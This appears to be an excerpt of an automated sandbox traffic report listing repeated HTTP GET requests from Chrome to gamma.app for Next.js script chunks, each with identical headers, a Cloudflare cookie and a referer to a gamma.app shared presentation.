__cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7762-42f8cc94865ab3c9.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9863-c78addf4281ddbfa.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6953-71c1fc7276963d58.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6852-30334c7472d0b470.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/12-c25ec07ff90a914d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3589-9680b5f77c624cec.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4787-9b5513938716add8.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9786-8aee26c1eec5d36a.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1786-a1cc54383f32c7ea.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1970-fb7b0eada1a1d383.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8495-73c6d4d8f3c3ec48.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3251-1e5b95673f45dfa7.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1368-a34fc175a13a2b77.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9639-5367407e5eee259b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/847-80bc03112a432dd0.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4229-b14fe1f0c105af0b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8911-824b40cefe500108.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8766-87c6e55349e9bebe.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6113-088aa42ef101225d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
